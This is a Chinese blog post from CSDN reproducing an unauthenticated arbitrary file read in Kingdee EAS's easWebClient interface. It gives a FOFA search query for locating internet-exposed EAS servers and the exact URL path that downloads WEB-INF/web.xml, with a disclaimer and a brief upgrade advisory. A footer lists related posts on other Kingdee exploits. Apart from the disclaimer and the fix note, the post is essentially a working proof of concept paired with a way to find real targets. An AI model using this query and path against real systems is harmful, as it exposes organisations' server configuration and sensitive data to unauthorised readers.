金蝶-EAS easWebClient 任意文件读取漏洞复现

最新推荐文章于 2024-04-03 18:17:22 发布
最新推荐文章于 2024-04-03 18:17:22 发布
阅读量1.9k 收藏 2
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/136183425
版权

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。

二、漏洞描述

金蝶EAS easWebClient 接口存在任意文件读取漏洞,未经授权的攻击者通过该漏洞读取任意文件,获取系统敏感信息。

三、影响范围

未知

四、复现环境

FOFA:

body="easSessionId" || header="easportal" || header="eassso/login" || banner="eassso/login" || body="/eassso/common" || (title="EAS系统登录" && body="金蝶")

五、漏洞复现

1.访问存在漏洞的网站
在这里插入图片描述
在这里插入图片描述

2.直接访问ip+port/easWebClient/deploy/client/ctrlhome/webapps/extweb/WEB-INF/web.xml即可下载文件

3.成功
在这里插入图片描述

六、修复建议

官方已修复该漏洞,请及时升级到最新版本。

https://www.kingdee.com/
明丨通
关注
金蝶EAS easWebClient接口任意文件读取
weixin_43567873的博客
03-05 659
金蝶EAS easWebClient接口处存在任意文件读取
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
nnn2188185的博客
01-08 843
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
金蝶云星空任意文件读取漏洞复现
08-01 1143
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。
EAS中获取配置文件信息
SKYLOVE111的专栏
12-05 1932
一般情况下客户都有至少两个EAS服务器(一个测试机、一个生产机),在开发webService接口等功能时往往需要获取主机ip,此时如果写死ip在环境切换时就要改代码(不可取),故采用配置文件的方式将不同ip配置properties文件里,代码中自动回去即可。 取数代码: Properties mailConfig = new Properties(); InputStream in;
金蝶EAS_任意文件读取
m0_64366018的博客
01-13 458
可以读取任意文件,这里只做测试,读取C:/Windows/win.ini。
复现金蝶EAS系统 文件读取漏洞_13
fushuang333的博客
01-09 1572
复现金蝶EAS 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件
金蝶EASEAS Cloud远程代码执行漏洞
hackzkaq的博客
10-13 845
金蝶 EASEAS Cloud 存在远程代码执行漏洞
金蝶 EASEAS Cloud任意文件上传漏洞复现
0xSec
11-20 1215
金蝶 EASEAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
金蝶EAS pdfviewlocal 任意文件读取漏洞复现
0xSec
01-08 1276
金蝶EAS pdfviewlocal接口处存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
【1day】复现金蝶OA CommonFileServer任意文件读取漏洞
记录并分享学习安全的知识点..
08-02 1109
金蝶OA存在敏感文件泄露漏洞,攻击者利用此漏洞可访问敏感信息。
金蝶云星空任意文件读取漏洞复现(0day)
0xSec
07-31 2755
由于金蝶云星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。
漏洞复现金蝶 EAS createdatasource jndi 远程代码执行漏洞
最新发布
qq_67810151的博客
04-03 340
金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。
金蝶EAS代码执行漏洞
zkaqlaoniao的博客
10-13 305
金蝶 EASEAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 8882
文件读取漏洞文件下载漏洞文件包含漏洞三者结合,靶场练习
金蝶 EASEAS Cloud JNDI注入漏洞复现
0xSec
12-22 1331
金蝶 EASEAS Cloudappmonitor/protect/jndi/loadTree 路径 jndiName 参数存在JNDI注入漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
金蝶协同办公平台任意文件下载漏洞(无需登录)
weixin_50464560的博客
08-30 3222
直接访问即可下载该文件了,保存的文件名为:file.txt。很明显的任意文件下载漏洞,随便在网上找一个实例进行证明。经测试发现,该系统存在任意文件下载,且无需登录。
漏洞复现金蝶EAS uploadlogo 存在任意文件上传漏洞
https://blog.echo234.cn/
03-28 706
金蝶EAS帮助企业构筑业财资税票档一体化平台,提升企业在市场竞争中的数字战斗力,金蝶EAS uploadlogo存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
java导致敏感信息泄漏的异常_金蝶AES系统Java web配置文件敏感信息泄露漏洞
weixin_42123296的博客
03-09 897
### 0x01 漏洞框架金蝶软件始创于1993年,是一家ERP、财务等企业管理软件厂商,拥有官网(kigndee.com)、友商网(youshang.com)、快递100(kuaidi100.com)、云之家(kdweibo.com)等互联网业务应用官方主页:www.kingdee.com客户案例:![](https://images.seebug.org/contribute/f1e376de...
某蝶EAS(Enterprise Application Suite)平台myUploadFile接口任意文件上传漏洞复现 CNVD-2023-57598
afei001
10-17 625
某蝶EAS(Enterprise Application Suite)是金某集团开发的一套企业级应用软件解决方案。它是一款集成化的企业管理软件,旨在帮助企业实现业务流程的数字化、自动化和优化。金蝶EAS提供了多个功能模块,涵盖了企业的各个方面,包括财务管理、人力资源管理、供应链管理、生产制造管理、销售与客户关系管理、项目管理等。这些模块可以根据企业的需求进行灵活的配置和定制,以满足不同行业和规模企业的管理需求。 某蝶EAS平台myUploadFile接口存在任意文件上传漏洞,攻击者可利用该
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值